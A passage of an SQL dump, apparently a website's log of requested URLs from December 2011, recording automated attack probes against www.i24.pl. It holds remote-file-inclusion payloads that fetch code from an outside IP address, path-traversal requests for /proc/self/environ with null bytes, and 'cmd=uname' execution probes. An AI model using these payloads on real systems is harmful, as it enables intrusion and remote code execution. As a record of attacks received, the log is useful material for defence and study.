00:00:00'),(145,'http://www.i24.pl/includes/bbcb_mg.php?phpbb_root_path=','','','',0,'2011-12-19 01:30:40','0000-00-00 00:00:00'),(146,'http://www.i24.pl/includes/class_template.php?phpbb_root_path=','','','',0,'2011-12-19 01:30:43','0000-00-00 00:00:00'),(147,'http://www.i24.pl/includes/common.php?foing_root_path=','','','',0,'2011-12-19 01:30:45','0000-00-00 00:00:00'),(148,'http://www.i24.pl/includes/functions.php?phpbb_root_path=','','','',0,'2011-12-19 01:30:55','0000-00-00 00:00:00'),(149,'http://www.i24.pl/includes/functions_admin.php?phpbb_root_path=','','','',0,'2011-12-19 01:30:58','0000-00-00 00:00:00'),(150,'http://www.i24.pl/includes/functions_cms.php?phpbb_root_path=','','','',0,'2011-12-19 01:30:59','0000-00-00 00:00:00'),(151,'http://www.i24.pl/includes/functions_kb.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:00','0000-00-00 00:00:00'),(152,'http://www.i24.pl/includes/functions_mod_user.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:01','0000-00-00 00:00:00'),(153,'http://www.i24.pl/includes/functions_newshr.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:03','0000-00-00 00:00:00'),(154,'http://www.i24.pl/includes/functions_nomoketos_rules.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:04','0000-00-00 00:00:00'),(155,'http://www.i24.pl/includes/functions_num_image.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:05','0000-00-00 00:00:00'),(156,'http://www.i24.pl/includes/functions_portal.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:06','0000-00-00 00:00:00'),(157,'http://www.i24.pl/includes/functions_static_topics.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:06','0000-00-00 00:00:00'),(158,'http://www.i24.pl/includes/functions_user_viewed_posts.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:07','0000-00-00 00:00:00'),(159,'http://www.i24.pl/includes/journals_delete.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:14','0000-00-00 00:00:00'),(160,'http://www.i24.pl/includes/journals_edit.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:15','0000-00-00 00:00:00'),(161,'http://www.i24.pl/includes/journals_post.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:15','0000-00-00 00:00:00'),(162,'http://www.i24.pl/includes/kb_constants.php?module_root_path=','','','',0,'2011-12-19 01:31:15','0000-00-00 00:00:00'),(163,'http://www.i24.pl/includes/logger_engine.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:20','0000-00-00 00:00:00'),(164,'http://www.i24.pl/includes/themen_portal_mitte.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:37','0000-00-00 00:00:00'),(165,'http://www.i24.pl/includes/usercp_viewprofile.php?phpbb_root_path=','','','',0,'2011-12-19 01:31:39','0000-00-00 00:00:00'),(166,'http://www.i24.pl/language/lang_english/lang_activity.php?phpbb_root_path=','','','',0,'2011-12-19 01:34:00','0000-00-00 00:00:00'),(167,'http://www.i24.pl/language/lang_english/lang_prillian_faq.php?phpbb_root_path=','','','',0,'2011-12-19 01:34:01','0000-00-00 00:00:00'),(168,'http://www.i24.pl/language/lang_french/lang_prillian_faq.php?phpbb_root_path=','','','',0,'2011-12-19 01:34:02','0000-00-00 00:00:00'),(169,'http://www.i24.pl/language/lang_german/lang_main_album.php?phpbb_root_path=','','','',0,'2011-12-19 01:34:03','0000-00-00 00:00:00'),(170,'http://www.i24.pl/lib/phpbb.php?subdir=','','','',0,'2011-12-19 01:34:21','0000-00-00 00:00:00'),(171,'http://www.i24.pl/list.php?foing_root_path=','','','',0,'2011-12-19 01:34:34','0000-00-00 00:00:00'),(172,'http://www.i24.pl/list.php?phpbb_root_path=','','','',0,'2011-12-19 01:34:35','0000-00-00 00:00:00'),(173,'http://www.i24.pl/login.php?foing_root_path=','','','',0,'2011-12-19 01:34:43','0000-00-00 00:00:00'),(174,'http://www.i24.pl/m2f/m2f_cron.php?m2f_root_path=','','','',0,'2011-12-19 01:34:48','0000-00-00 00:00:00'),(175,'http://www.i24.pl/m2f/m2f_forum.php?m2f_root_path=','','','',0,'2011-12-19 01:34:49','0000-00-00 00:00:00'),(176,'http://www.i24.pl/m2f/m2f_mailinglist.php?m2f_root_path=','','','',0,'2011-12-19 01:34:50','0000-00-00 00:00:00'),(177,'http://www.i24.pl/m2f/m2f_phpbb204.php?m2f_root_path=','','','',0,'2011-12-19 01:34:50','0000-00-00 00:00:00'),(178,'http://www.i24.pl/menu.php?sesion_idioma=','','','',0,'2011-12-19 01:35:16','0000-00-00 00:00:00'),(179,'http://www.i24.pl/mods/iai/includes/constants.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:30','0000-00-00 00:00:00'),(180,'http://www.i24.pl/modules/Forums/admin/admin_avatar.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:39','0000-00-00 00:00:00'),(181,'http://www.i24.pl/modules/Forums/admin/admin_board.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:40','0000-00-00 00:00:00'),(182,'http://www.i24.pl/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:41','0000-00-00 00:00:00'),(183,'http://www.i24.pl/modules/Forums/admin/admin_disallow.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:42','0000-00-00 00:00:00'),(184,'http://www.i24.pl/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:42','0000-00-00 00:00:00'),(185,'http://www.i24.pl/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:43','0000-00-00 00:00:00'),(186,'http://www.i24.pl/modules/Forums/admin/admin_forums.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:44','0000-00-00 00:00:00'),(187,'http://www.i24.pl/modules/Forums/admin/admin_groups.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:44','0000-00-00 00:00:00'),(188,'http://www.i24.pl/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:45','0000-00-00 00:00:00'),(189,'http://www.i24.pl/modules/Forums/admin/admin_ranks.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:45','0000-00-00 00:00:00'),(190,'http://www.i24.pl/modules/Forums/admin/admin_smilies.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:46','0000-00-00 00:00:00'),(191,'http://www.i24.pl/modules/Forums/admin/admin_styles.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:47','0000-00-00 00:00:00'),(192,'http://www.i24.pl/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:48','0000-00-00 00:00:00'),(193,'http://www.i24.pl/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:48','0000-00-00 00:00:00'),(194,'http://www.i24.pl/modules/Forums/admin/admin_users.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:49','0000-00-00 00:00:00'),(195,'http://www.i24.pl/modules/Forums/admin/admin_words.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:50','0000-00-00 00:00:00'),(196,'http://www.i24.pl/modules/Forums/admin/index.php?phpbb_root_path=','','','',0,'2011-12-19 01:35:50','0000-00-00 00:00:00'),(197,'http://www.i24.pl/modules/mod_whosonline.php','','','',0,'2011-12-19 01:36:30','0000-00-00 00:00:00'),(198,'http://www.i24.pl/olbookmarks-0.7.4/themes/test1.php?http://62.141.58.186/google.txt','','','',0,'2011-12-19 01:37:24','0000-00-00 00:00:00'),(199,'http://www.i24.pl/phpBB2/shoutbox.php?phpbb_root_path=','','','',0,'2011-12-19 01:37:51','0000-00-00 00:00:00'),(200,'http://www.i24.pl/playlist.php?foing_root_path=','','','',0,'2011-12-19 01:38:19','0000-00-00 00:00:00'),(201,'http://www.i24.pl/playlist.php?phpbb_root_path=','','','',0,'2011-12-19 01:38:20','0000-00-00 00:00:00'),(202,'http://www.i24.pl/pmwiki','','','',0,'2011-12-19 01:38:35','0000-00-00 00:00:00'),(203,'http://www.i24.pl/pollvote/pollvote.php?pollname','','','',0,'2011-12-19 01:38:45','0000-00-00 00:00:00'),(204,'http://www.i24.pl/root/includes/antispam.php?phpbb_root_path=','','','',0,'2011-12-19 01:39:15','0000-00-00 00:00:00'),(205,'http://www.i24.pl/skin/zero_vote/error.php','','','',0,'2011-12-19 01:40:02','0000-00-00 00:00:00'),(206,'http://www.i24.pl/song.php?foing_root_path=','','','',0,'2011-12-19 01:40:11','0000-00-00 00:00:00'),(207,'http://www.i24.pl/song.php?phpbb_root_path=','','','',0,'2011-12-19 01:40:12','0000-00-00 00:00:00'),(208,'http://www.i24.pl/stat_modules/users_age/module.php?phpbb_root_path=','','','',0,'2011-12-19 01:40:36','0000-00-00 00:00:00'),(209,'http://www.i24.pl/toplist.php?f=toplist_top10&phpbb_root_path=','','','',0,'2011-12-19 01:41:39','0000-00-00 00:00:00'),(210,'http://www.i24.pl/view_artist.php?foing_root_path=','','','',0,'2011-12-19 01:42:07','0000-00-00 00:00:00'),(211,'http://www.i24.pl/view_song.php?foing_root_path=','','','',0,'2011-12-19 01:42:08','0000-00-00 00:00:00'),(212,'http://www.i24.pl/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_pathhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:42:30','0000-00-00 00:00:00'),(213,'http://www.i24.pl/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefixhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:42:33','0000-00-00 00:00:00'),(214,'http://www.i24.pl/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_pathhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:42:36','0000-00-00 00:00:00'),(215,'http://www.i24.pl/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_pathhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:42:41','0000-00-00 00:00:00'),(216,'http://www.i24.pl/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_pathhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:42:46','0000-00-00 00:00:00'),(217,'http://www.i24.pl/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_pathhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:42:52','0000-00-00 00:00:00'),(218,'http://www.i24.pl/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_pathhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:42:53','0000-00-00 00:00:00'),(219,'http://www.i24.pl/webmail/lib/emailreader_execute_on_each_page.inc.php?emailread','','','',0,'2011-12-19 01:43:04','0000-00-00 00:00:00'),(220,'http://www.i24.pl/catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:24','0000-00-00 00:00:00'),(221,'http://www.i24.pl/include/new-visitor.inc.php?lvc_include_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:25','0000-00-00 00:00:00'),(222,'http://www.i24.pl/_functions.php?prefix=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:25','0000-00-00 00:00:00'),(223,'http://www.i24.pl/cpcommerce/_functions.php?prefix=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:25','0000-00-00 00:00:00'),(224,'http://www.i24.pl/modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:26','0000-00-00 00:00:00'),(225,'http://www.i24.pl/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:26','0000-00-00 00:00:00'),(226,'http://www.i24.pl/ashnews.php?pathtoashnews=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:27','0000-00-00 00:00:00'),(227,'http://www.i24.pl/eblog/blog.inc.php?xoopsConfig[xoops_url]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:27','0000-00-00 00:00:00'),(228,'http://www.i24.pl/pm/lib.inc.php?pm_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:27','0000-00-00 00:00:00'),(229,'http://www.i24.pl/b2-tools/gm-2-b2.php?b2inc=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:28','0000-00-00 00:00:00'),(230,'http://www.i24.pl/includes/include_once.php?include_file=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:29','0000-00-00 00:00:00'),(231,'http://www.i24.pl/e107/e107_handlers/secure_img_render.php?p=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:30','0000-00-00 00:00:00'),(232,'http://www.i24.pl/shoutbox/expanded.php?conf=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:30','0000-00-00 00:00:00'),(233,'http://www.i24.pl/main.php?x=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:30','0000-00-00 00:00:00'),(234,'http://www.i24.pl/myPHPCalendar/admin.php?cal_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:31','0000-00-00 00:00:00'),(235,'http://www.i24.pl/index.php/main.php?x=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:31','0000-00-00 00:00:00'),(236,'http://www.i24.pl/template.php?pagina=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:34','0000-00-00 00:00:00'),(237,'http://www.i24.pl/includes/include_onde.php?include_file=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:36','0000-00-00 00:00:00'),(238,'http://www.i24.pl/db.php?path_local=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:39','0000-00-00 00:00:00'),(239,'http://www.i24.pl/htmltonuke.php?filnavn=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:40','0000-00-00 00:00:00'),(240,'http://www.i24.pl/livehelp/inc/pipe.php?HCL_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:41','0000-00-00 00:00:00'),(241,'http://www.i24.pl/hcl/inc/pipe.php?HCL_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:41','0000-00-00 00:00:00'),(242,'http://www.i24.pl/inc/pipe.php?HCL_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:42','0000-00-00 00:00:00'),(243,'http://www.i24.pl/support/faq/inc/pipe.php?HCL_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:42','0000-00-00 00:00:00'),(244,'http://www.i24.pl/help/faq/inc/pipe.php?HCL_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:42','0000-00-00 00:00:00'),(245,'http://www.i24.pl/helpcenter/inc/pipe.php?HCL_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:43','0000-00-00 00:00:00'),(246,'http://www.i24.pl/live-support/inc/pipe.php?HCL_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:43','0000-00-00 00:00:00'),(247,'http://www.i24.pl/gnu3/index.php?doc=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:44','0000-00-00 00:00:00'),(248,'http://www.i24.pl/gnu/index.php?doc=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:44','0000-00-00 00:00:00'),(249,'http://www.i24.pl/phpgwapi/setup/tables_update.inc.php?appdir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:45','0000-00-00 00:00:00'),(250,'http://www.i24.pl/forum/install.php?phpbb_root_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:45','0000-00-00 00:00:00'),(251,'http://www.i24.pl/includes/calendar.php?phpc_root_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:45','0000-00-00 00:00:00'),(252,'http://www.i24.pl/includes/setup.php?phpc_root_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:46','0000-00-00 00:00:00'),(253,'http://www.i24.pl/inc/authform.inc.php?path_pre=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:46','0000-00-00 00:00:00'),(254,'http://www.i24.pl/include/authform.inc.php?path_pre=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:47','0000-00-00 00:00:00'),(255,'http://www.i24.pl/includes/header.php?systempath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:52','0000-00-00 00:00:00'),(256,'http://www.i24.pl/Gallery/displayCategory.php?basep','','','',0,'2011-12-19 01:43:52','0000-00-00 00:00:00'),(257,'http://www.i24.pl/index.inc.php?PATH_Includ','','','',0,'2011-12-19 01:43:52','0000-00-00 00:00:00'),(258,'http://www.i24.pl/nphp/nphpd.php?nphp_config[LangFile]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:53','0000-00-00 00:00:00'),(259,'http://www.i24.pl/ashnews.php?pathtoashnews','','','',0,'2011-12-19 01:43:54','0000-00-00 00:00:00'),(260,'http://www.i24.pl/ashheadlines.php?pathtoas','','','',0,'2011-12-19 01:43:54','0000-00-00 00:00:00'),(261,'http://www.i24.pl/modules/xgallery/upgrade_album.php?GALLERY','','','',0,'2011-12-19 01:43:54','0000-00-00 00:00:00'),(262,'http://www.i24.pl/demo/includes/init.php?user_inc=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:55','0000-00-00 00:00:00'),(263,'http://www.i24.pl/jaf/index.php?show=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:55','0000-00-00 00:00:00'),(264,'http://www.i24.pl/inc/shows.inc.php?cutepath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:56','0000-00-00 00:00:00'),(265,'http://www.i24.pl/poll/admin/common.inc.php?base_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:56','0000-00-00 00:00:00'),(266,'http://www.i24.pl/pollvote/pollvote.php?pollname=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:56','0000-00-00 00:00:00'),(267,'http://www.i24.pl/sources/post.php?fil_config=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:57','0000-00-00 00:00:00'),(268,'http://www.i24.pl/modules/My_eGallery/public/displayCategory.php?basep','','','',0,'2011-12-19 01:43:57','0000-00-00 00:00:00'),(269,'http://www.i24.pl/bb_lib/checkdb.inc.php?libpach=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:43:58','0000-00-00 00:00:00'),(270,'http://www.i24.pl/include/livre_include.php?no_conn','','','',0,'2011-12-19 01:43:58','0000-00-00 00:00:00'),(271,'http://www.i24.pl/modules/mod_mainmenu.php?mosConfi','','','',0,'2011-12-19 01:43:59','0000-00-00 00:00:00'),(272,'http://www.i24.pl/pivot/modules/module_db.php?pivot_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:00','0000-00-00 00:00:00'),(273,'http://www.i24.pl/modules/4nAlbum/public/displayCategory.php?basep','','','',0,'2011-12-19 01:44:00','0000-00-00 00:00:00'),(274,'http://www.i24.pl/derniers_commentaires.php','','','',0,'2011-12-19 01:44:00','0000-00-00 00:00:00'),(275,'http://www.i24.pl/modules/coppermine/include/init.inc.php?CPG_M_DIR=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:01','0000-00-00 00:00:00'),(276,'http://www.i24.pl/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:02','0000-00-00 00:00:00'),(277,'http://www.i24.pl/coppermine/themes/maze/theme.php?THEME_DIR=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:02','0000-00-00 00:00:00'),(278,'http://www.i24.pl/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:03','0000-00-00 00:00:00'),(279,'http://www.i24.pl/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:03','0000-00-00 00:00:00'),(280,'http://www.i24.pl/agendax/addevent.inc.php?agendax_','','','',0,'2011-12-19 01:44:04','0000-00-00 00:00:00'),(281,'http://www.i24.pl/modules/xoopsgallery/upgrade_album.php?GALLERY','','','',0,'2011-12-19 01:44:05','0000-00-00 00:00:00'),(282,'http://www.i24.pl/main.php?page=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:05','0000-00-00 00:00:00'),(283,'http://www.i24.pl/default.php?page=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:06','0000-00-00 00:00:00'),(284,'http://www.i24.pl/index1.php?p=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:06','0000-00-00 00:00:00'),(285,'http://www.i24.pl/index2.php?x=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:07','0000-00-00 00:00:00'),(286,'http://www.i24.pl/index2.php?content=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:07','0000-00-00 00:00:00'),(287,'http://www.i24.pl/include/new-visitor.inc.php?lvc_inclu','','','',0,'2011-12-19 01:44:09','0000-00-00 00:00:00'),(288,'http://www.i24.pl/modules/agendax/addevent.inc.php?agendax_','','','',0,'2011-12-19 01:44:09','0000-00-00 00:00:00'),(289,'http://www.i24.pl/library/editor/editor.php?root=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:11','0000-00-00 00:00:00'),(290,'http://www.i24.pl/library/lib.php?root=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:11','0000-00-00 00:00:00'),(291,'http://www.i24.pl/zentrack/index.php?configFile=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:12','0000-00-00 00:00:00'),(292,'http://www.i24.pl/becommunity/community/index.php?pageurl=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:13','0000-00-00 00:00:00'),(293,'http://www.i24.pl/GradeMap/index.php?page=../../../../../../../proc/self/environ\0','','','',0,'2011-12-19 01:44:14','0000-00-00 00:00:00'),(294,'http://www.i24.pl/phpopenchat/contrib/yabbse/poc.php?sourcedir=/.xpl/asc?&cmd=uname','','','',0,'2011-12-19 01:44:14','0000-00-00 00:00:00'),(295,'http://www.i24.pl/omegaaudyt','','','',0,'2011-12-19 20:04:21','0000-00-00 00:00:00'),(296,'http://www.i24.pl/11','','','',0,'2011-12-20 03:11:36','0000-00-00 00:00:00'),(297,'http://www.i24.pl/wp-login.php','','','',0,'2011-12-20 19:50:37','0000-00-00 00:00:00'),(298,'http://www.i24.pl/umbraco/','','','',0,'2011-12-20 19:50:37','0000-00-00 00:00:00'),(299,'http://www.i24.pl/dynamix/','','','',0,'2011-12-20 19:50:39','0000-00-00 00:00:00'),(300,'http://www.i24.pl/sitecore/','','','',0,'2011-12-20 19:50:39','0000-00-00 00:00:00'),(301,'http://www.i24.pl/n2/','','','',0,'2011-12-20 19:50:41','0000-00-00 00:00:00'),(302,'http://www.i24.pl/calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname','','','',0,'2011-12-21 08:18:43','0000-00-00 00:00:00'),(303,'http://www.i24.pl/calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname','','','',0,'2011-12-21 08:18:47','0000-00-00 00:00:00'),(304,'http://www.i24.pl/calendar/events/header.inc.php?serverPath','','','',0,'2011-12-21 08:18:48','0000-00-00 00:00:00'),(305,'http://www.i24.pl/calendar/events/datePicker.php?serverPath','','','',0,'2011-12-21 08:18:51','0000-00-00 00:00:00'),(306,'http://www.i24.pl/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname','','','',0,'2011-12-21 08:18:55','0000-00-00 00:00:00'),(307,'http://www.i24.pl/calendar/setup/header.inc.php?serverPath','','','',0,'2011-12-21 08:18:56','0000-00-00 00:00:00'),(308,'http://www.i24.pl/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:19:01','0000-00-00 00:00:00'),(309,'http://www.i24.pl/inc/header.php/step_one.php?server_inc=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:19:03','0000-00-00 00:00:00'),(310,'http://www.i24.pl/install/index.php?lng=../../include/main.inc&G_PATH=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:19:04','0000-00-00 00:00:00'),(311,'http://www.i24.pl/include/write.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:19:05','0000-00-00 00:00:00'),(312,'http://www.i24.pl/support/mailling/maillist/inc/initdb.php?absolute_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:19:09','0000-00-00 00:00:00'),(313,'http://www.i24.pl/coppercop/theme.php?THEME_DIR=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:19:09','0000-00-00 00:00:00'),(314,'http://www.i24.pl/yabbse/Sources/Packages.php?sourcedir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:19:44','0000-00-00 00:00:00'),(315,'http://www.i24.pl/path_of_cpcommerce/_functions.php?prefix../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:19:46','0000-00-00 00:00:00'),(316,'http://www.i24.pl/dotproject/modules/projects/addedit.php?root_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:19:47','0000-00-00 00:00:00'),(317,'http://www.i24.pl/dotproject/modules/projects/view.php?root_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:19:47','0000-00-00 00:00:00'),(318,'http://www.i24.pl/dotproject/modules/projects/vw_files.php?root_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:19:48','0000-00-00 00:00:00'),(319,'http://www.i24.pl/dotproject/modules/tasks/addedit.php?root_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:19:52','0000-00-00 00:00:00'),(320,'http://www.i24.pl/dotproject/modules/tasks/viewgantt.php?root_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:19:55','0000-00-00 00:00:00'),(321,'http://www.i24.pl/My_eGallery/public/displayCategory.php?basep','','','',0,'2011-12-21 08:19:56','0000-00-00 00:00:00'),(322,'http://www.i24.pl/phpshop/index.php?base_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:21','0000-00-00 00:00:00'),(323,'http://www.i24.pl/admin.php?cal_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:21','0000-00-00 00:00:00'),(324,'http://www.i24.pl/cpcommerce/_functions.php?prefix=','','','',0,'2011-12-21 08:20:22','0000-00-00 00:00:00'),(325,'http://www.i24.pl/contacts.php?cal_dir=','','','',0,'2011-12-21 08:20:23','0000-00-00 00:00:00'),(326,'http://www.i24.pl/convert-date.php?cal_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:23','0000-00-00 00:00:00'),(327,'http://www.i24.pl/album_portal.php?phpbb_ro','','','',0,'2011-12-21 08:20:24','0000-00-00 00:00:00'),(328,'http://www.i24.pl/mainfile.php?MAIN_PATH=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:25','0000-00-00 00:00:00'),(329,'http://www.i24.pl/dotproject/modules/files/index_table.php?root_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:27','0000-00-00 00:00:00'),(330,'http://www.i24.pl/html/affich.php?base=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:28','0000-00-00 00:00:00'),(331,'http://www.i24.pl/gallery/init.php?HTTP_POST_VARS=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:28','0000-00-00 00:00:00'),(332,'http://www.i24.pl/ideabox/include.php?gorumDir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:33','0000-00-00 00:00:00'),(333,'http://www.i24.pl/index2.php?includes_dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:34','0000-00-00 00:00:00'),(334,'http://www.i24.pl/forums/toplist.php?phpbb_root_pa','','','',0,'2011-12-21 08:20:34','0000-00-00 00:00:00'),(335,'http://www.i24.pl/forum/toplist.php?phpbb_root_pa','','','',0,'2011-12-21 08:20:35','0000-00-00 00:00:00'),(336,'http://www.i24.pl/admin/config_settings.tpl.php?i','','','',0,'2011-12-21 08:20:36','0000-00-00 00:00:00'),(337,'http://www.i24.pl/include/common.php?include_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:37','0000-00-00 00:00:00'),(338,'http://www.i24.pl/event/index.php?page=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:37','0000-00-00 00:00:00'),(339,'http://www.i24.pl/forum/index.php?includeFooter=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:40','0000-00-00 00:00:00'),(340,'http://www.i24.pl/forums/index.php?includeFooter=../../../../../../../proc/self/environ\0','','','',0,'2011-12-21 08:20:40','0000-00-00 00:00:00'),(341,'http://www.i24.pl/forum/bb_admin.php?includeFoote','','','',0,'2011-12-21 08:20:41','0000-00-00 00:00:00'),(342,'http://www.i24.pl/forums/bb_admin.php?includeFoote','','','',0,'2011-12-21 08:20:42','0000-00-00 00:00:00'),(343,'http://www.i24.pl/language/lang_english/lang_activity.php?phpbb_r','','','',0,'2011-12-21 08:20:46','0000-00-00 00:00:00'),(344,'http://www.i24.pl/forum/language/lang_english/lang_activity.php?phpbb_r','','','',0,'2011-12-21 08:20:46','0000-00-00 